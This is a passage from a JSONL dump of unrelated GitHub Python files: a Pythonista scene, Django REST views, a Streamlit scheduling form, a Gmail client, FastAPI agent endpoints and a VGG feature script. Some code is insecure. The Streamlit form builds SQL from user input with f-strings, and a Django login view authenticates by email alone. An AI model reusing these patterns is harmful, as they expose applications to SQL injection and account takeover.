SpriteNode(pic,parent=self)\n\t\tself.pic_node.anchor_point=(0.5,0.5)\n\t\tself.pic_node.position=(self.size.w/2,self.size.h/2)\n\t\tself.pic_node.scale=0.5\n\t\t\n\t\tline,pos=my_line(100,100,300,300)\n\t\tself.lin_node = ShapeNode(line,stroke_color='#6875ff',parent=self)\n\t\tself.lin_node.position=pos\n\t\t\n\t\tself.txt_node = LabelNode('Hello,this is stan',font,parent=self)\n\t\tself.txt_node.position = (self.size.w/2,4*self.size.h/5)\n\t\tself.txt_node.color='#ff4646'\n\t\t\n\tdef touch_moved(self,touch) :\n\t\tx,y=touch.location\n\t\tself.pic_node.position=touch.location\n\t\tplay_effect('8ve:8ve-slide-network',2)\n\t\t\n\t\t\n\tdef touch_began(self,touch) :\n\t\tself.txt_node.position=touch.location\n\t\tplay_effect('digital:HighDown',0.1)\n\tdef touch_ended(self,touch) :\n\t\tself.lin_node.position=touch.location\n\t\tplay_effect('digital:HighUp',0.5)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\nrun(myscene(),PORTRAIT,show_fps=True)\n","repo_name":"stan12138/archive","sub_path":"script/pythonista/scene_example.py","file_name":"scene_example.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"73040974119","text":"import pandas as pd\nimport argparse\n\ndef main():\n df = pd.read_csv('/home/hanieh/car/bama.csv')\n m = df.value_counts([\"brand\", \"model\"])\n print(type(m))\n m.to_csv('/home/hanieh/car/counter.csv')\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv_path', type=str, help='path of csv file ', default='/home/hanieh/car/bama.csv')\n parser.add_argument('--result', type=str, help='path of result file', default='/home/hanieh/car/counter.csv')\n\n arguments = parser.parse_args()\n return arguments\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n main()","repo_name":"haniehakhavan/car-detection","sub_path":"count cars.py","file_name":"count cars.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11484920302","text":"import re\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom django.http import JsonResponse\n\n# Create your views here.\nfrom django.contrib.auth.models import User\nfrom rest_framework.response import Response\nfrom .serializers import user_serializer,login_serializer,docs_serializer,appointment_serializer\nfrom rest_framework import status\nfrom users.models import *\n\n@api_view(['GET'])\ndef current_users(request):\n users=User.objects.all();\n users_json=user_serializer(users,many=True);\n print(users_json)\n return Response(users_json.data)\n \n \n@api_view(['POST'])\ndef add_users(request):\n user=request.data\n print(user)\n users_json=None\n if user:\n User.objects.create(username=user['name'],email=user['email'])\n User.save\n u=User.objects.get(username=user['name'])\n users_json=user_serializer(u,many=False)\n \n \n return Response(users_json.data, status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef login_auth(request):\n user=request.data\n login_user=User.objects.get(email=user['email'])\n print(login_user)\n if login_user:\n u=user_serializer(login_user,many=False)\n return Response(u.data,status=status.HTTP_200_OK)\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef getDoctors(request):\n docs=doctors.objects.all()\n docs_json=docs_serializer(docs,many=True)\n return Response(docs_json.data,status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef get_appointments(request,id):\n user_appointments=appointments.objects.filter(user=id);\n json=appointment_serializer(user_appointments,many=True);\n print(json)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_appointment(request,id):\n appointment=appointments.objects.get(id=id);\n json=appointment_serializer(appointment,many=False)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_doctor(request,id):\n doctor=doctors.objects.get(id=id);\n json=docs_serializer(doctor,many=False);\n return Response(json.data)\n\n@api_view(['DELETE'])\ndef delete_appointment(request,id):\n print(id)\n appointments.objects.get(id=id).delete()\n return Response(status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef add_appointment(request):\n data=request.data\n app=doctors.objects.get(id=data['doctor_id'])\n u=User.objects.get(id=data['user_id'])\n appointments.objects.create(user=u,doctor=app,time=data['appointment_date'])\n return Response(status=status.HTTP_200_OK)\n \n\n \n \n ","repo_name":"DeepakGonugunta/sdp4","sub_path":"djangorest/one/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4372033058","text":"import streamlit as st\nfrom utils.utils import *\nfrom datetime import time\n\ndef create_form():\n weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n avaiable_codc=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodC FROM Corsi;\"):\n avaiable_codc.append(row[0])\n avaiable_codf=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodFisc FROM Istruttore;\"):\n avaiable_codf.append(row[0])\n\n\n with st.form(\"New scheduled lesson\"):\n codf=st.selectbox(label=\"Trainer ID code selection\", options=avaiable_codf)\n cols = st.columns(5)\n with cols[0]:\n codc=st.selectbox(label=\"Course selection\", options=avaiable_codc)\n with cols[1]:\n giorno=st.selectbox(label=\"Course day selection \", options=weekdays)\n with cols[2]:\n orainizio=st.time_input(label=\"Start time selection\", step=300, value=time(hour=8))\n with cols[3]:\n durata=st.number_input(label=\"Course duration\", max_value=60, step=5, min_value=5, value=30)\n with cols[4]:\n sala=st.text_input(label=\"Room number\", max_chars=5, placeholder=\"S****\")\n \n submitted= st.form_submit_button(\"Submit\", type='primary')\n\n if submitted: \n if sala=='': \n st.warning(body=\"Insert the room number first.\")\n else:\n overlaps=execute_query(conn=st.session_state[\"connection\"], \n query=f\"SELECT STR_TO_DATE(OraInizio, '%H:%i:%s') as OraInizio, DATE_ADD(STR_TO_DATE(OraInizio, '%H:%i:%s'), INTERVAL Durata MINUTE) as OraFine FROM Programma WHERE CodC='{codc}' AND Giorno='{giorno}' ORDER BY OraInizio, Durata;\")\n flag=True\n for row in overlaps:\n if not (time_to_seconds(orainizio, durata)<=row[0].total_seconds() or time_to_seconds(orainizio,0)>=row[1].total_seconds()):\n flag=False\n\n if flag==False:\n st.error(body=\"There's at least another scheduled lesson for the same course that overlap with the selected time.\")\n else:\n execute_query(conn=st.session_state[\"connection\"],\n query=f\"INSERT INTO Programma (CodFisc, Giorno, OraInizio, Durata, Sala, CodC) VALUES ('{codf}','{giorno}','{orainizio}',{durata},'{sala}','{codc}');\")\n st.success(body=\"Insertion to database successful.\")\n\nif __name__ == \"__main__\":\n st.title(\":green[Add new scheduled lesson for a specific course]\")\n if check_connection() is not False:\n create_form()","repo_name":"erikscolaro/MySQL-streamlit_training_project","sub_path":"pages/5_Add_new_lesson.py","file_name":"5_Add_new_lesson.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4092752056","text":"\nimport os\nimport numpy as np\n\nfrom sverchok.utils.math import inverse, inverse_square, inverse_cubic\n\ndef show_welcome():\n text = r\"\"\"\n\n ________ .___ _________\n / _____/ | | / _____/\n/ \\ ___ | | \\_____ \\ \n\\ \\_\\ \\ | | / \\ nodes for Sverchok\n \\______ / |___| /_______ /\n \\/ \\/ \n initialized.\n\n\"\"\"\n can_paint = os.name in {'posix'}\n\n with_color = \"\\033[1;31m{0}\\033[0m\" if can_paint else \"{0}\"\n for line in text.splitlines():\n print(with_color.format(line))\n\n\ndef register_class_factory_deps(classes, deps=None):\n \"\"\"\n usage\n from sverchok_gis.utils import registration_class_factory_deps\n\n classes = [SvSGNImportGeometryLine]\n register, unregister = sverchok.utils.registration_class_factory_deps(classes, deps=[gpd])\n\n \"\"\"\n import bpy\n\n if not deps:\n return bpy.utils.register_classes_factory(classes)\n\n\n def register():\n if all(deps):\n _ = [bpy.utils.register_class(c) for c in classes]\n\n def unregister():\n if all(deps):\n _ = [bpy.utils.unregister_class(c) for c in reversed(classes)]\n\n return register, unregister\n\n\n","repo_name":"Marcus-Richmond/sverchok-gis-nodes","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"14127415072","text":"import json\nimport uuid\nfrom pprint import pformat\nfrom urllib.parse import urljoin\n\nimport requests\nfrom flask import current_app, session, url_for\nfrom requests.auth import HTTPBasicAuth\n\nfrom edusign_webapp.utils import get_authn_context\n\n\ndef pretty_print_req(req: requests.PreparedRequest) -> str:\n \"\"\"\n Pretty print `requests.PreparedRequest`, used for logging\n\n :param req: The request to print\n :return: Pretty printed reepresentation of the request\n \"\"\"\n return '{}\\n{}\\r\\n{}\\r\\n\\r\\n{}'.format(\n '-----------START-----------',\n str(req.method) + ' ' + str(req.url),\n '\\r\\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),\n str(req.body)[:100],\n )\n\n\nclass APIClient(object):\n \"\"\"\n Class holding methods to communicate with the Signature Service Integration REST-Service.\n\n Instances of `edusign_webapp.run.EduSignApp` Flask app has a property `api_client` that is an\n instance of this class.\n \"\"\"\n\n class ExpiredCache(Exception):\n \"\"\"\n When the client sends a document to the API to be prepared, the API will keep it\n in its cache for a configurable amount of time (15 minutes by default). Afterwards\n it will be removed.\n If the client tries to create a sign request referencing a document that has been\n removed from the cache, it will obtain an error response. So it uses this exception\n to signal such condition, to indicate that it is necessary to prepare the document\n again before trying to continue with the signing process.\n \"\"\"\n\n pass\n\n def __init__(self, config: dict):\n \"\"\"\n Initialize the client object with configuration gathered by flask.\n We need 3 parameters here:\n\n + The base URL of the signature service / API\n + The profile in the API to use - for which we have credentials (HTTP Basic Auth)\n + The HTTP Basic Auth credentials.\n\n :param config: Dict containing the configuration parameters provided to Flask.\n \"\"\"\n self.api_base_url = config['EDUSIGN_API_BASE_URL']\n self.profile = config['EDUSIGN_API_PROFILE']\n self.basic_auth = HTTPBasicAuth(config['EDUSIGN_API_USERNAME'], config['EDUSIGN_API_PASSWORD'])\n self.config = config\n\n def _post(self, url: str, request_data: dict) -> dict:\n \"\"\"\n Method to POST to the eduSign API, used by all methods of the class\n that POST to it.\n\n :param url: URL to send the POST to\n :param request_data: Dict holding the data to POST.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n requests_session = requests.Session()\n req = requests.Request('POST', url, json=request_data, auth=self.basic_auth)\n prepped = requests_session.prepare_request(req)\n\n current_app.logger.debug(f\"Request sent to the API's {url} method: {pretty_print_req(prepped)}\")\n\n settings = requests_session.merge_environment_settings(prepped.url, {}, None, None, None)\n response = requests_session.send(prepped, **settings)\n current_app.logger.debug(f\"Response from the API's {url} method: {response}\")\n return response.json()\n\n def prepare_document(self, document: dict) -> dict:\n \"\"\"\n Send request to the `prepare` endpoint of the API.\n This API method will prepare a PDF document\n with a PDF signature page containing a visible PDF signature image,\n and keep it cached for 15min by default.\n\n The main pieces of data we have to send to this endpoint are:\n\n * pdfDocument: The PDF document as base64 data.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.signerName.signerAttributes:\n The list of attributes to be used in the signature, given as `{name: }` objects.\n These are attributes released by the SAML IdP, and their name must be in uri format.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.fieldValues.idp:\n The value of this field will appear in the signature image as the \"Authenticated by\" entity.\n We here try to provide the organization name as provided by Shibboleth, and in case it is not\n found, the entityID of the IdP chosen by the user. Note that the client (the flask app)\n will try to identify the user via seamlessaccess.org, and it will record the IdP chosen by\n the user to use it here.\n\n There are other parameters to control the insertion of the signature image in the document,\n which we've just valued as suggested in [1].\n\n The structure of the JSON to send would be something like:\n\n .. code:\n {\n \"pdfDocument\": \"JVBERi0xLj...lJUVPRgo=\",\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": {\"signerAttributes\": [ {\"name\" : \"urn:oid:2.16.840.1.113730.3.1.241\"} ]},\n \"fieldValues\": {\"idp\": \"Snake Oil Co\"},\n },\n \"failWhenSignPageFull\": true,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": true,\n },\n }\n\n :param document: Dict holding the PDF (data and metadata) to prepare for signing.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n idp = session['idp']\n if self.config['ENVIRONMENT'] == 'development':\n # This is only to test the app in a development environment.\n idp = self.config['DEBUG_IDP']\n\n if session.get('organizationName', None) is not None:\n idp = session['organizationName']\n\n attrs = [{'name': attr} for attr in self.config['SIGNER_ATTRIBUTES'].keys()]\n current_app.logger.debug(f\"signerAttributes sent to the prepare endpoint: {attrs}\")\n\n doc_data = document['blob']\n if ',' in doc_data:\n doc_data = doc_data.split(',')[1]\n\n request_data = {\n \"pdfDocument\": doc_data,\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": {\"signerAttributes\": attrs},\n \"fieldValues\": {\"idp\": idp},\n },\n \"failWhenSignPageFull\": True,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": True,\n },\n }\n api_url = urljoin(self.api_base_url, f'prepare/{self.profile}')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's prepare endpoint: {pformat(tolog)}\")\n\n return response\n\n def _try_creating_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Send request to the `create` endpoint of the API.\n This API method is used to create a sign request that can then be POSTed\n to the signature service, to initiate the actual signing process.\n\n It will include references to all the already prepared documents that\n need to be signed, kept in the API's cache.\n\n The main pieces of data we have to send to this endpoint are:\n\n + correlationId: A unique identifier for this request to create a sign request.\n\n + signRequesterID: is the SAML entityID of the SAML SP that authenticated the user,\n and who is the requesting entity of the signature operation. It has to coincide with\n whatever has been configured in the signature service.\n\n + returnUrl: The URL of the callback endpoint in the client, to which the user\n will be redirected after completing the signature process at the sign service.\n\n + authnRequirements.authnServiceID: entityID of the IdP that will perform the authentication\n for signature.\n\n + authnRequirements.authnContextClassRefs: The AuthnContextClassRef URI(s) that we request\n that the user is authenticated under.\n\n + authnRequirements.requestedSignerAttributes: A list of SAML attributes and values.\n It is necessary to provide values for all atributes previously sent as signerAttributes\n to the `prepare` endpoint.\n\n + tbsDocuments: A list in which each item carries metadata about one the documents to be signed.\n The metadata is as follows:\n\n + tbsDocuments.N.id: A unique identifier for the document issued by the client.\n\n + tbsDocuments.N.contentReference: This value was in the response from the API to the call\n to the `prepare` endpoint, as `updatedPdfDocumentReference`.\n\n + tbsDocuments.N.mimeType: application/pdf\n\n + tbsDocuments.N.visiblePdfSignatureRequirement: This was also in the response from the API\n to the call to the `prepare` endpoint.\n\n So the structure of the JSON to send would be something like:\n\n {\n \"correlationId\": \"11111111-1111-1111-1111-111111111111\",\n \"signRequesterID\": \"https://example.org/shibboleth\",\n \"returnUrl\": \"https://example.org/callback\",\n \"authnRequirements\": {\n \"authnServiceID\": \"https://idp.example.org/shibboleth\",\n \"authnContextClassRefs\": [ \"http://id.elegnamnden.se/loa/1.0/loa3\" ],\n \"requestedSignerAttributes\": [\n {\n \"name\": \"urn:oid:2.16.840.1.113730.3.1.241\",\n \"value\": \"John Doe\",\n }\n ],\n },\n \"tbsDocuments\": [],\n }\n\n And each itme in `tbsDocuments` would have the structure:\n\n {\n \"id\": \"22222222-2222-2222-2222-222222222222\",\n \"contentReference\": \"33333333-3333-3333-3333-333333333333\",\n \"mimeType\": \"application/pdf\",\n \"visiblePdfSignatureRequirement\": { \"...\" },\n }\n\n :param documents: List with (already prepared) documents to include in the sign request.\n :return: Pair of Flask representation of the HTTP response from the API,\n and list of mappings linking the documents' names with the generated ids.\n \"\"\"\n idp = session['idp']\n if self.config['ENVIRONMENT'] == 'development':\n idp = self.config['DEBUG_IDP']\n\n authn_context = get_authn_context(documents)\n\n correlation_id = str(uuid.uuid4())\n return_url = url_for('edusign.sign_service_callback', _external=True, _scheme='https')\n attrs = [{'name': attr, 'value': session[name]} for attr, name in self.config['SIGNER_ATTRIBUTES'].items()]\n\n request_data = {\n \"correlationId\": correlation_id,\n \"signRequesterID\": self.config['SIGN_REQUESTER_ID'],\n \"returnUrl\": return_url,\n \"authnRequirements\": {\n \"authnServiceID\": idp,\n \"authnContextClassRefs\": authn_context,\n \"requestedSignerAttributes\": attrs,\n },\n \"tbsDocuments\": [],\n }\n documents_with_id = []\n for document in documents:\n doc_with_id = {'name': document['name'], 'key': str(document['key'])}\n if add_blob:\n doc_with_id['blob'] = document['blob']\n doc_with_id['size'] = document['size']\n doc_with_id['size'] = document['size']\n doc_with_id['type'] = document['type']\n documents_with_id.append(doc_with_id)\n request_data['tbsDocuments'].append(\n {\n \"id\": str(document['key']),\n \"contentReference\": document['ref'],\n \"mimeType\": document['type'],\n \"visiblePdfSignatureRequirement\": json.loads(document['sign_requirement']),\n }\n )\n api_url = urljoin(self.api_base_url, f'create/{self.profile}')\n\n return self._post(api_url, request_data), documents_with_id\n\n def create_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Use the `_try_creating_sign_request` method to create a sign request\n at the `create` endpoint of the API.\n\n It is possible that the documents referenced in the requests have been cleared from\n the API's cache; in that case, the response from the API will have an error code\n indicating that condition. This method will then raise an `ExpiredCache` eception,\n and it is the responsability of the calling method to restart the process: Send the\n documents again to be prepared, and then try again to create a sign request.\n\n If successful, this method will return the response with the sign request, to be POSTed\n from the user agent to initiate the actual signing of the document.\n\n :param documents: List with (already prepared) documents to include in the sign request.\n :raises ExpiredCache: When the response from the API indicates that the documents to sign\n have dissapeared from the API's cache.\n :return: Data (with the sign request) contained in the response from the API,\n and a list of mappings linking the documents' names with the generated ids (sent to\n the API as tbsDocuments.N.id).\n \"\"\"\n response_data, documents_with_id = self._try_creating_sign_request(documents, add_blob=add_blob)\n\n if (\n 'status' in response_data\n and response_data['status'] == 400\n and 'message' in response_data\n and 'not found in cache' in response_data['message']\n ):\n\n raise self.ExpiredCache()\n\n if current_app.logger.level == 'DEBUG':\n tolog = response_data.copy()\n tolog['signRequest'] = tolog['signRequest'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's create endpoint: {pformat(tolog)}\")\n\n return response_data, documents_with_id\n\n def process_sign_request(self, sign_response: dict, relay_state: str) -> requests.Response:\n \"\"\"\n This method is meant to be called after the user has completed the sgnature process, through the\n sign service and the IdP. At this point, the documents are signed and kept in the API's cache.\n So here we send a request to the `proccess` endpoint of the API to retrieve them.\n\n The main pieces of data we have to send to this endpoint are:\n\n + signResponse\n + realyState\n + state\n\n The values for these are all present in the POST that the user agent sends to the callback in the client app\n (whose URL we sent to the `create` endpoint as `returnUrl`), after returning from the sign service and IdP.\n\n The reponse to this call will contain, in addition to some more metadata, the signed documents, in a list\n `signedDocuments`, where each document includes:\n\n + id: the id of the document, sent to the `create` endpoint as tbsDocuments.N.id;\n + signedContent: The signed document encoded as base64;\n + mimeType: \"application/pdf\"\n\n Send request to the `process` endpoint of the API.\n This API method will process the DSS SignRequest in order to get the signed document.\n\n :param sign_response: signResponse data as returned from the `create` endpoint of the eduSign API.\n :param relay_state: Relay state as returned from the `create` endpoint of the eduSign API.\n :return: Data (containing the signed documents in successful requests) received in the HTTP response\n from the API.\n \"\"\"\n request_data = {\"signResponse\": sign_response, \"relayState\": relay_state, \"state\": {\"id\": relay_state}}\n api_url = urljoin(self.api_base_url, 'process')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's process endpoint: {pformat(tolog)}\")\n\n return response\n","repo_name":"SUNET/edusign-app","sub_path":"backend/src/edusign_webapp/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":16468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"26121963505","text":"__author__ = 'hungtantran'\r\n\r\n\r\nimport httplib2\r\nimport os\r\nimport base64\r\nfrom email.mime.text import MIMEText\r\n\r\nfrom apiclient import discovery\r\nimport oauth2client\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\n\r\nfrom constants_config import Config\r\nimport logger\r\n\r\ntry:\r\n import argparse\r\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n flags = None\r\n\r\n\r\nclass GmailClient(object):\r\n SCOPES = 'https://www.googleapis.com/auth/gmail.modify'\r\n APPLICATION_NAME = 'gmail_client'\r\n\r\n def __init__(self, secret_json, user_id):\r\n self.secret_json = secret_json\r\n self.user_id = user_id\r\n\r\n credentials = self.get_credentials(secret_json)\r\n http = credentials.authorize(httplib2.Http())\r\n self.service = discovery.build('gmail', 'v1', http=http)\r\n\r\n def get_credentials(self, secret_json):\r\n \"\"\"Gets valid user credentials from storage.\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n credential_dir = os.path.join('.credentials')\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir, 'secret.json')\r\n\r\n store = oauth2client.file.Storage(credential_path)\r\n credentials = store.get()\r\n if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(secret_json, GmailClient.SCOPES)\r\n flow.user_agent = GmailClient.APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n return credentials\r\n\r\n def CreateMessage(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Create a message for an email.\r\n\r\n Args:\r\n sender: Email address of the sender.\r\n to: Email address of the receiver.\r\n subject: The subject of the email message.\r\n message_text: The text of the email message.\r\n\r\n Returns:\r\n An object containing a base64url encoded email object.\r\n \"\"\"\r\n message = MIMEText(content)\r\n message['to'] = toLine\r\n\r\n if ccLine is not None:\r\n message['cc'] = ccLine\r\n\r\n if bccLine is not None:\r\n message['bcc'] = bccLine\r\n\r\n message['from'] = Config.gmail_client_userid\r\n message['subject'] = subject\r\n return {'raw': base64.urlsafe_b64encode(message.as_string())}\r\n\r\n def send_mail(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Send an email message.\r\n\r\n Args:\r\n service: Authorized Gmail API service instance.\r\n user_id: User's email address. The special value \"me\"\r\n can be used to indicate the authenticated user.\r\n message: Message to be sent.\r\n\r\n Returns:\r\n Sent Message.\r\n \"\"\"\r\n try:\r\n logger.Logger.log(logger.LogLevel.INFO, 'Try sending message with subject %s to %s' % (subject, toLine))\r\n message = self.CreateMessage(content, subject, toLine, ccLine, bccLine)\r\n message = (self.service.users().messages().send(userId=self.user_id,\r\n body=message).execute())\r\n logger.Logger.log(logger.LogLevel.INFO, 'Sent message id: %s' % message['id'])\r\n return message\r\n except Exception as e:\r\n logger.Logger.log(logger.LogLevel.ERROR, e)\r\n\r\n\r\n","repo_name":"hungtantran/Findata","sub_path":"Common/gmail_client.py","file_name":"gmail_client.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1373699957","text":"import random\nfrom color import color\nclass RandomColor():\n def __init__(self, screen_array):\n self.screen_array = screen_array\n\n def randomColor(self):\n return color(random.randint(0, 2), random.randint(0, 2), random.randint(0, 2))\n\n def randomColorFill(self, x, y, x2, y2,types='two_ang'):\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = self.randomColor()\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = self.randomColor()\n\n def randomOneColorFill(self, x, y, x2, y2,types='two_ang'):\n random_color = self.randomColor()\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = random_color\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = random_color","repo_name":"lllzebralll/TGL","sub_path":"randomColor.py","file_name":"randomColor.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40057820614","text":"from query_builder import QueryBuilder\nfrom connect_mysql import Conexao\nfrom mysql.connector import Error\n\nclass Inserir(QueryBuilder):\n def __init__(self,table,data):\n super().__init__(table,data)\n self.conn = Conexao()\n\n def _sql(self):\n key = self._dados_chave()\n valor = self._dados_valores()\n campos = \",\".join(key)\n valores = \"','\".join(valor)\n sql = \"INSERT INTO \" + self._tabela + \" (\" + campos + \") VALUES ('\" + valores + \"');\"\n\n return sql\n\n def get(self):\n try:\n sql = self._sql()\n conn = self.conn.connection()\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n print(f'{cursor.rowcount} linha(s) afetada(s)')\n cursor.close()\n except Error as erro:\n print(f'Falha ao inserir dados ao banco {erro}')\n finally:\n if (conn.is_connected()):\n conn.close()\n print(\"conexao finalizada\")","repo_name":"wellz3280/estudos-python","sub_path":"query_builder/inserir.py","file_name":"inserir.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34022533848","text":"from asgiref.sync import sync_to_async\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db.models import Q\nfrom fastapi import HTTPException, APIRouter, Depends\nfrom typing import Optional\nfrom pydantic import BaseModel\nfrom uuid import UUID\nfrom ix.agents.models import Agent\nfrom ix.api.auth import get_request_user\nfrom ix.api.chains.endpoints import DeletedItem\nfrom ix.api.agents.types import Agent as AgentPydantic, AgentPage\n\n__all__ = [\"router\", \"AgentCreateUpdate\"]\n\n\nrouter = APIRouter()\n\n\nclass AgentCreateUpdate(BaseModel):\n name: str\n alias: str\n purpose: str\n chain_id: UUID\n model: str = \"gpt-4\"\n config: dict = {}\n\n\n@router.post(\"/agents/\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def create_agent(\n agent: AgentCreateUpdate, user: AbstractUser = Depends(get_request_user)\n):\n agent_obj = Agent(user=user, **agent.dict())\n await agent_obj.asave()\n return AgentPydantic.from_orm(agent_obj)\n\n\n@router.get(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def get_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n return AgentPydantic.from_orm(agent)\n\n\n@router.get(\"/agents/\", response_model=AgentPage, tags=[\"Agents\"])\nasync def get_agents(\n search: Optional[str] = None,\n chat_id: Optional[UUID] = None,\n limit: int = 10,\n offset: int = 0,\n user: AbstractUser = Depends(get_request_user),\n):\n query = Agent.objects.filter(is_test=False).order_by(\"alias\")\n query = Agent.filter_owners(user, query)\n if chat_id:\n query = query.filter(chats__id=chat_id)\n if search:\n query = query.filter(Q(name__icontains=search) | Q(alias__icontains=search))\n\n # punting on async implementation of pagination until later\n return await sync_to_async(AgentPage.paginate)(\n output_model=AgentPydantic, queryset=query, limit=limit, offset=offset\n )\n\n\n@router.put(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def update_agent(\n agent_id: str,\n agent: AgentCreateUpdate,\n user: AbstractUser = Depends(get_request_user),\n):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent_obj = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n for attr, value in agent.dict().items():\n setattr(agent_obj, attr, value)\n await agent_obj.asave()\n return agent_obj\n\n\n@router.delete(\"/agents/{agent_id}\", response_model=DeletedItem, tags=[\"Agents\"])\nasync def delete_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n await agent.adelete()\n return DeletedItem(id=agent_id)\n","repo_name":"kreneskyp/ix","sub_path":"ix/api/agents/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":809,"dataset":"github-code","pt":"18"} +{"seq_id":"29908103607","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# coding:utf-8\n\nimport numpy as np\nimport cv2 as cv\ntry:\n import cPickle as pickle\nexcept ModuleNotFoundError:\n import _pickle as pickle\nfrom chainer import cuda\nfrom chainer import Variable\n\n\ndef vggparamater(image, gpu, vgg): # image:str(path to image file) gpu:number(gpu-id)\n\n mean = np.array([103.939, 116.779, 123.68])\n img = cv.imread(image).astype(np.float32)\n img -= mean\n img = cv.resize(img, (224, 224)).transpose((2, 0, 1))\n img = img[np.newaxis, :, :, :]\n\n if gpu >= 0:\n cuda.get_device(gpu).use()\n vgg.to_gpu()\n img = cuda.cupy.asarray(img, dtype=np.float32)\n\n pred = vgg(Variable(img), None)\n\n if gpu >= 0:\n pred = cuda.to_cpu(pred.data)\n else:\n pred = pred.data\n\n with open('pca.pickle', mode='rb') as f:\n pca = pickle.load(f, encoding='latin1')\n\n result = pca.transform(pred)\n\n # PCAmean = 